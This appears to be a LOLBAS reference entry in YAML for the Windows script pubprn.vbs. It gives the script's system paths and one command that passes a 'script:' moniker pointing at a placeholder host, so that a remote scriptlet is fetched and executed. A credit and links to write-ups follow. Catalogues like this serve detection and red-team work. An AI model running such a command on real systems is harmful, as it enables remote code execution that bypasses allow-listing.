---
Name: Pubprn.vbs
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
  - Command: pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
    Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection.
Full Path:
  - C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
  - C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
Code Sample:
  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Pubprn_calc.sct
Detection: []
Resources:
  - https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
  - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
  - https://github.com/enigma0x3/windows-operating-system-archaeology
Notes: Thanks to Matt Nelson - @enigma0x3